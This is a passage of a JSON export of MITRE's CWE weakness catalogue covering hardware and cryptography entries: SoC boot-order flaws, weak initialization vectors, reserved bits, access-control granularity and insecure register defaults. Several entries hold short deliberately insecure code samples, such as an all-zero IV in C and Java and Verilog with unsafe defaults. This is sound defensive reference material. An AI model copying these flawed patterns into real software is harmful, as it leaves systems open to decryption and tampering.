Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":"Every identity generated in the SoC should be unique and\\n                    immutable in hardware. The actions that an IP is trusted or\\n                    not trusted should be clearly defined, implemented,\\n                    configured, and tested. If the definition is implemented via a\\n                    policy, then the policy should be immutable or protected with\\n                    clear authentication and authorization."}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"113"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1193":{"attr":{"@_ID":"1193","@_Name":"Power-On of Untrusted Execution Core Before Enabling Fabric Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product enables components that contain untrusted firmware before memory and fabric access controls have been enabled.","Extended_Description":{"xhtml:p":"After initial reset, System-on-Chip (SoC) fabric access controls and other\\n           security features need to be programmed by trusted firmware as part\\n           of the boot sequence. If untrusted IPs or peripheral microcontrollers\\n\\t   are enabled first, then the untrusted component can master\\n           transactions on the hardware bus and target memory or other assets to\\n           compromise the SoC boot firmware."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High","Note":"An untrusted component can master transactions on the HW bus and target memory or other assets to compromise the SoC boot firmware."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"The boot sequence should enable fabric access controls and memory protections before enabling third-party hardware IPs and peripheral microcontrollers that use untrusted firmware."}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1130"}},{"attr":{"@_External_Reference_ID":"REF-1042"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated References, Related_Attack_Patterns"}}},"1204":{"attr":{"@_ID":"1204","@_Name":"Generation of Weak Initialization Vector (IV)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a cryptographic primitive that uses an Initialization\\n\\t\\t\\tVector (IV), but the product does not generate IVs that are\\n\\t\\t\\tsufficiently unpredictable or unique according to the expected\\n\\t\\t\\tcryptographic requirements for that primitive.","Extended_Description":"By design, some cryptographic primitives\\n\\t\\t\\t  (such as block ciphers) require that IVs\\n\\t\\t\\t  must have certain properties for the\\n\\t\\t\\t  uniqueness and/or unpredictability of an\\n\\t\\t\\t  IV. Primitives may vary in how important\\n\\t\\t\\t  these properties are. If these properties\\n\\t\\t\\t  are not maintained, e.g. by a bug in the\\n\\t\\t\\t  code, then the cryptography may be weakened\\n\\t\\t\\t  or broken by attacking the IVs themselves.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the IV is not properly initialized, data that is encrypted can be compromised and information about the data can be leaked. See [REF-1179]."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":{"xhtml:p":["Different cipher\\n\\t\\t\\t    modes have different requirements for\\n\\t\\t\\t    their IVs. When choosing and implementing\\n\\t\\t\\t    a mode, it is important to understand\\n\\t\\t\\t    those requirements in order to keep\\n\\t\\t\\t    security guarantees intact. Generally, it\\n\\t\\t\\t    is safest to generate a random IV, since\\n\\t\\t\\t    it will be both unpredictable and have a\\n\\t\\t\\t    very low chance of being non-unique. IVs\\n\\t\\t\\t    do not have to be kept secret, so if\\n\\t\\t\\t    generating duplicate IVs is a concern, a\\n\\t\\t\\t    list of already-used IVs can be kept and\\n\\t\\t\\t    checked against.","NIST offers recommendations on generation of IVs for modes of which they have approved. These include options for when random IVs are not practical. For CBC, CFB, and OFB, see [REF-1175]; for GCM, see [REF-1178]."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-143"},"Intro_Text":"In the following examples, CBC mode is used when encrypting data:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"EVP_CIPHER_CTX ctx;char key[EVP_MAX_KEY_LENGTH];char iv[EVP_MAX_IV_LENGTH];RAND_bytes(key, b);memset(iv,0,EVP_MAX_IV_LENGTH);EVP_EncryptInit(&amp;ctx,EVP_bf_cbc(), key,iv);","xhtml:br":["","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class SymmetricCipherTest {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static void main() {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"byte[] text =\\"Secret\\".getBytes();byte[] iv ={};KeyGenerator kg = KeyGenerator.getInstance(\\"DES\\");kg.init(56);SecretKey key = kg.generateKey();Cipher cipher = Cipher.getInstance(\\"DES/CBC/PKCS5Padding\\");IvParameterSpec ips = new IvParameterSpec(iv);cipher.init(Cipher.ENCRYPT_MODE, key, ips);return cipher.doFinal(inpBytes);","xhtml:br":["","","","","","","","",""],"xhtml:div":{"#text":"0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00","attr":{"@_style":"margin-left:10px;"}}}}}}}}],"Body_Text":"In both of these examples, the initialization vector (IV) is always a block of zeros. This makes the resulting cipher text much more predictable and susceptible to a dictionary attack."},{"Intro_Text":"The Wired Equivalent Privacy (WEP) protocol used in the 802.11\\n\\t\\t\\t    wireless standard only supported 40-bit keys, and the IVs were only 24\\n\\t\\t\\t    bits, increasing the chances that the same IV would be reused for\\n\\t\\t\\t    multiple messages. The IV was included in plaintext as part of the packet, making\\n\\t\\t\\t    it directly observable to attackers. Only 5000 messages are needed\\n\\t\\t\\t    before a collision occurs due to the \\"birthday paradox\\" [REF-1176]. Some\\n\\t\\t\\t    implementations would reuse the same IV for each packet. This IV reuse\\n\\t\\t\\t    made it much easier for attackers to recover plaintext from\\n\\t\\t\\t    two packets with the same IV, using well-understood attacks,\\n\\t\\t\\t    especially if the plaintext was known for one of the packets [REF-1175]."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-1472","Description":"ZeroLogon vulnerability - use of a static IV of all zeroes in AES-CFB8 mode","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472"},{"Reference":"CVE-2011-3389","Description":"BEAST attack in SSL 3.0 / TLS 1.0. In CBC mode, chained initialization vectors are non-random, allowing decryption of HTTPS traffic using a chosen plaintext attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389"},{"Reference":"CVE-2001-0161","Description":"wireless router does not use 6 of the 24 bits for WEP encryption, making it easier for attackers to decrypt traffic","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0161"},{"Reference":"CVE-2001-0160","Description":"WEP card generates predictable IV values, making it easier for attackers to decrypt traffic","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0160"},{"Reference":"CVE-2017-3225","Description":"device bootloader uses a zero initialization vector during AES-CBC","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3225"},{"Reference":"CVE-2016-6485","Description":"crypto framework uses PHP rand function - which is not cryptographically secure - for an initialization vector","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6485"},{"Reference":"CVE-2014-5386","Description":"encryption routine does not seed the random number generator, causing the same initialization vector to be generated repeatedly","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5386"},{"Reference":"CVE-2020-5408","Description":"encryption functionality in an authentication framework uses a fixed null IV with CBC mode, allowing attackers to decrypt traffic in applications that use this functionality","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5408"},{"Reference":"CVE-2017-17704","Description":"messages for a door-unlocking product use a fixed IV in CBC mode, which is the same after each restart","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17704"},{"Reference":"CVE-2017-11133","Description":"application uses AES in CBC mode, but the pseudo-random secret and IV are generated using math.random, which is not cryptographically strong.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11133"},{"Reference":"CVE-2007-3528","Description":"Blowfish-CBC implementation constructs an IV where each byte is calculated modulo 8 instead of modulo 256, resulting in less than 12 bits for the effective IV length, and less than 4096 possible IV values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3528"}]},"Functional_Areas":{"Functional_Area":"Cryptography"},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"20"}},{"attr":{"@_CAPEC_ID":"97"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1175","@_Section":"3. Risks of Keystream Reuse"}},{"attr":{"@_External_Reference_ID":"REF-1175","@_Section":"Appendix C"}},{"attr":{"@_External_Reference_ID":"REF-1176"}},{"attr":{"@_External_Reference_ID":"REF-1177"}},{"attr":{"@_External_Reference_ID":"REF-1178","@_Section":"8.2 IV Constructions"}},{"attr":{"@_External_Reference_ID":"REF-1179"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t\\t\\t  predictability can vary widely. Within the developer and other\\n\\t\\t\\t  communities, \\"randomness\\" is used heavily. However, within\\n\\t\\t\\t  cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t\\t\\t  measurement. There are no commonly-used definitions, even within\\n\\t\\t\\t  standards documents and cryptography papers. Future versions of\\n\\t\\t\\t  CWE will attempt to define these terms and, if necessary,\\n\\t\\t\\t  distinguish between them in ways that are appropriate for\\n\\t\\t\\t  different communities but do not reduce the usability of CWE for\\n\\t\\t\\t  mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-03-09"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Observed_Examples, References"}}},"1209":{"attr":{"@_ID":"1209","@_Name":"Failure to Disable Reserved Bits","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The reserved bits in a hardware design are not disabled prior to production. Typically, reserved bits are used for future capabilities and should not support any functional logic in the design.   However, designers might covertly use these bits to debug or further develop new capabilities in production hardware. Adversaries with access to these bits will write to them in hopes of compromising hardware state.","Extended_Description":{"xhtml:p":"Reserved bits are labeled as such so they can be allocated for a later purpose. They are not to do anything in the current design.  However, designers might want to use these bits to debug or control/configure a future capability to help minimize time to market (TTM). If the logic being controlled by these bits is still enabled in production, an adversary could use the logic to induce unwanted/unsupported behavior in the hardware."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The Designer and Implementer have to make a conscious choice to do this"},{"Phase":"Implementation","Note":"The Designer and Implementer have to make a conscious choice to do this"},{"Phase":"Documentation","Note":"If documentation labels anything \\"for future use\\", \\"reserved\\", or the like, such labeling could indicate to an attacker a potential attack point"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Varies by Context","Note":"This type of weakness all depends on the capabilities of the logic being controlled or configured by the reserved bits"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"Include a feature to disable reserved bits."}},{"Phase":"Integration","Description":{"xhtml:p":"Any writes to these reserve bits are blocked (e.g., ignored, access-protected, etc.), or an exception can be asserted."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An adversary may perform writes to reserve space in hopes to change the behavior of the hardware.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"// Assume an IP has address space 0x0-0x0F for its configuration registers, with the last one labeled reserved (i.e. 0x0F).  Therefore inside the Finite State Machine (FSM), the code is as follows:reg gpio_out = 0;  //gpio should remain low for normal operationcase (register_address)4\'b1111 : //0x0Fbegingpio_out = 1;end","xhtml:br":["","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"reg gpio_out = 0;  //gpio should remain low for normal operationcase (register_address)//4\'b1111 : //0x0Fdefault: gpio_out = gpio_out;","xhtml:br":["","",""]}}],"Body_Text":"In the code above, the GPIO pin should remain low for normal operation.  However, it can be asserted by accessing the reserved address space (0x0F).  This may be a concern if the GPIO state is being used as an indicator of health (e.g. if asserted the hardware may respond by shutting down or resetting the system which may not be the correct action the system should perform)."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"121"}}},"Content_History":{"Submission":{"Submission_Name":"Brent Sherman","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-06"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1220":{"attr":{"@_ID":"1220","@_Name":"Insufficient Granularity of Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements access controls via a policy or other feature with the intention to disable or restrict accesses (reads and/or writes) to assets in a system from untrusted agents. However, implemented access controls lack required granularity, which renders the control policy too broad because it allows accesses from unauthorized agents to the security-sensitive assets.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware engines can expose accesses to assets (device configuration, keys, etc.) to trusted firmware or a software module (commonly set by BIOS/bootloader). This access is typically access-controlled. Upon a power reset, the hardware or system usually starts with default values in registers, and the trusted firmware (Boot firmware) configures the necessary access-control protection.","A common weakness that can exist in such protection schemes is that access controls or policies are not granular enough. This condition allows agents beyond trusted agents to access assets and could lead to a loss of functionality or the ability to set up the device securely. This further results in security risks from leaked, sensitive, key material to modification of device configuration."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Other"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Access-control-policy protections must be reviewed for design inconsistency and common weaknesses.","Access-control-policy definition and programming flow must be tested in pre-silicon, post-silicon testing."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":{"xhtml:p":["Consider a system with a register for storing AES key for encryption or decryption. The key is 128 bits, implemented as a set of four 32-bit registers. The key registers are assets and registers, AES_KEY_READ_POLICY and AES_KEY_WRITE_POLICY, and are defined to provide necessary access controls.","The read-policy register defines which agents can read the AES-key registers, and write-policy register defines which agents can program or write to those registers. Each register is a 32-bit register, and it can support access control for a maximum of 32 agents. The number of the bit when set (i.e., \\"1\\") allows respective action from an agent whose identity matches the number of the bit and, if \\"0\\" (i.e., Clear), disallows the respective action to that corresponding agent."]},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0",{"#text":"AES key [0:31] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_1",{"#text":"AES key [32:63] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_2",{"#text":"AES key [64:95] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_4",{"#text":"AES key [96:127] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_KEY_READ_WRITE_POLICY","[31:0] Default 0x00000006 - meaning agent with identities \\"1\\" and \\"2\\" can both read from and write to key registers"]}]}},{"attr":{"@_Nature":"mitigation"},"xhtml:table":{"xhtml:tr":[{"xhtml:td":["AES_KEY_READ_POLICY","[31:0] Default 0x00000002 - meaning only Crypto engine with identity \\"1\\" can read registers: AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]},{"xhtml:td":["AES_KEY_WRITE_POLICY","[31:0] Default 0x00000004 - meaning only trusted firmware with identity \\"2\\" can program registers: AES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]}]}}],"Body_Text":["In the above example, there is only one policy register that controls access to both read and write accesses to the AES-key registers, and thus the design is not granular enough to separate read and writes access for different agents. Here, agent with identities \\"1\\" and \\"2\\" can both read and write.","A good design should be granular enough to provide separate access controls to separate actions. Access control for reads should be separate from writes. Below is an example of such implementation where two policy registers are defined for each of these actions. The policy is defined such that: the AES-key registers can only be read or used by a crypto agent with identity \\"1\\" when bit #1 is set. The AES-key registers can only be programmed by a trusted firmware with identity \\"2\\" when bit #2 is set."]},{"Intro_Text":"Consider the following SoC\\n\\t      design. The sram in HRoT has an address range that is readable and writable by unprivileged\\n\\t      software and it has an area that is only readable by unprivileged software. The tbus\\n\\t      interconnect enforces access control for slaves on the bus but uses only one bit to control\\n\\t      both read and write access. Address 0xA0000000 - 0xA000FFFF is readable and writable\\n\\t      by the untrusted cores core{0-N} and address 0xA0010000 - 0xA001FFFF is only\\n\\t      readable by the untrusted cores core{0-N}.","Body_Text":{"xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/HRoT-CWE.png","@_alt":"Hardware Root of Trust"}},"xhtml:p":["The security policy access control is not granular enough, as it uses one bit to enable both\\n\\t      read and write access. This gives write access to an area that should only be readable\\n\\t      by unprivileged agents.","Access control logic should differentiate between read and write access and to have\\n\\t      sufficient address granularity."]}}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-05"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-07-16","Contribution_Comment":"Provided Demonstrative Example for Hardware Root of Trust"}}},"1221":{"attr":{"@_ID":"1221","@_Name":"Incorrect Register Defaults or Module Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Hardware description language code incorrectly defines register defaults or hardware IP parameters to insecure values.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to defined default values that are hard coded in the hardware description language (HDL) code of the hardware unit. Hardware descriptive languages also support definition of parameter variables, which can be defined in code during instantiation of the hardware IP module. Such parameters are generally used to configure a specific instance of a hardware IP in the design.","The system security settings of a hardware design can be affected by incorrectly defined default values or IP parameters. The hardware IP would be in an insecure state at power reset, and this can be exposed or exploited by untrusted software running on the system. Both register defaults and parameters are hardcoded values, which cannot be changed using software or firmware patches but must be changed in hardware silicon. Thus, such security issues are considerably more difficult to address later in the lifecycle. Hardware designs can have a large number of such parameters and register defaults settings, and it is important to have design tool support to check these settings in an automated way and be able to identify which settings are security sensitive."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Such issues could be introduced during implementation of hardware design, since IP parameters and defaults are defined in HDL code and identified later during Testing or System Configuration phases."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":"Varies by Context","Note":"Degradation of system functionality, or loss of access control enforcement can occur."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During hardware design, all the system parameters and register defaults must be reviewed to identify security sensitive settings."},{"Phase":"Implementation","Description":"The default values of these security sensitive settings need to be defined as part of the design review phase."},{"Phase":"Testing","Description":"Testing phase should use automated tools to test that values are configured per design specifications."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider example design module system verilog code shown below.register_example module is an example parameterized module that defines two parameters, REGISTER_WIDTH and REGISTER_DEFAULT. Register_example module defines a Secure_mode setting, which when set makes the register content read-only and not modifiable by software writes. register_top module instantiates two registers, Insecure_Device_ID_1 and Insecure_Device_ID_2. Generally, registers containing device identifier values are required to be read only to prevent any possibility of software modifying these values.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"// Parameterized Register module example// Secure_mode : REGISTER_DEFAULT[0] : When set to 1 register is read only and not writable///module register_examples#(parameter REGISTER_WIDTH = 8, // Parameter defines width of register, default 8 bitsparameter [REGISTER_WIDTH-1:0] REGISTER_DEFAULT = 2**REGISTER_WIDTH -2 // Default value of register computed from Width. Sets all bits to 1s except bit 0 (Secure _mode))(input [REGISTER_WIDTH-1:0] Data_in,input Clk,input resetn,input write,output reg [REGISTER_WIDTH-1:0] Data_out);reg Secure_mode;always @(posedge Clk or negedge resetn)if (~resetn)beginData_out &lt;= REGISTER_DEFAULT; // Register content set to Default at resetSecure_mode &lt;= REGISTER_DEFAULT[0]; // Register Secure_mode set at resetendelse if (write &amp; ~Secure_mode)beginData_out &lt;= Data_in;endendmodulemodule register_top(input Clk,input resetn,input write,input [31:0] Data_in,output reg [31:0] Secure_reg,output reg [31:0] Insecure_reg);register_example #(.REGISTER_WIDTH (32),.REGISTER_DEFAULT (1224) // Incorrect Default value used bit 0 is 0.) Insecure_Device_ID_1 (.Data_in (Data_in),.Data_out (Secure_reg),.Clk (Clk),.resetn (resetn),.write (write));register_example #(.REGISTER_WIDTH (32) // Default not defined 2^32-2 value will be used as default.) Insecure_Device_ID_2 (.Data_in (Data_in),.Data_out (Insecure_reg),.Clk (Clk),.resetn (resetn),.write (write));endmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"register_example #(.REGISTER_WIDTH (32),.REGISTER_DEFAULT (1225) // Correct default value set, to enable Secure_mode) Secure_Device_ID_example (.Data_in (Data_in),.Data_out (Secure_reg),.Clk (Clk),.resetn (resetn),.write (write));","xhtml:br":["","","","","","","","",""]}}],"Body_Text":["These example instantiations show how, in a hardware design, it would be possible to instantiate the register module with insecure defaults and parameters.","In the example design, both registers will be software writable since Secure_mode is defined as zero."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"166"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1222":{"attr":{"@_ID":"1222","@_Name":"Insufficient Granularity of Address Regions Protected by Register Locks","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product defines a large address region protected from modification by the same register lock control bit. This results in a conflict between the functional requirement that some addresses need to be writable by software during operation and the security requirement that the system configuration lock bit must be set during the boot process.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IPs can expose the device configuration controls that need to be programmed after device power reset by a trusted firmware or software module (commonly set by BIOS/bootloader) and then locked from any further modification. In hardware design, this is commonly implemented using a programmable lock bit which enables/disables writing to a protected set of registers or address regions. When the programmable lock bit is set, the relevant address region can be implemented as a hardcoded value in hardware logic that cannot be changed later.","A problem can arise wherein the protected region definition is not granular enough. After the programmable lock bit has been set, then this new functionality cannot be implemented without change to the hardware design."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1220","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"Such issues are introduced during hardware architecture and design since software controls and configuration are defined during these phases and identified later during Testing or System Configuration phases."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Other","Note":"System security configuration cannot be defined in a way that does not conflict with functional requirements of device."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":["The defining of protected locked registers should be reviewed or tested early in the design phase with software teams to ensure software flows are not blocked by the security locks.","As an alternative to using register lock control bits and fixed access control regions, the hardware design could use programmable security access control configuration so that device trusted firmware can configure and change the protected regions based on software usage and security models."]}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"For example, consider a hardware unit with a 32 kilobyte configuration address space where the first 8 kilobyte address contains security sensitive controls that must only be writable by device bootloader. One way to protect the security configuration could be to define a 32 bit system configuration locking register (SYS_LOCK) where each bit lock locks the corresponding 1 kilobyte region.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":[{"xhtml:tbody":{"xhtml:tr":[{"xhtml:th":["Address","Register"]},{"xhtml:td":[0,"SYS_LOCK: 32 bit system configuration lock register, each bit is write-1-once"]},{"xhtml:td":[4,"SECURITY_FEATURE_ENABLE: 32 bit register controlling enabling of security features"]},{"xhtml:td":["...",""]},{"xhtml:td":[784,"SW_MODE: 32 bit Software Mode indication register"]}]}},{"xhtml:tbody":{"xhtml:tr":[{"xhtml:th":["Address region","Lock bit"]},{"xhtml:td":["0x0000 - 0x03FF","SYS_LOCK[0]"]},{"xhtml:td":["0x0400 - 0x07FF","SYS_LOCK[1]"]},{"xhtml:td":["...",""]},{"xhtml:td":["0x7C00 - 0x7FFF","SYS_LOCK[31]"]}]}}]},"Body_Text":"If a register exists within the first kilobyte address range (e.g. SW_MODE, address 0x310) and needs to be software writable at runtime, then this register cannot be written in a securely configured system since SYS_LOCK register lock bit 0 must be set to protect other security settings (e.g. SECURITY_FEATURE_ENABLE, address 0x0004). The only fix would be to change the hardware logic or not set the security lock bit."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, 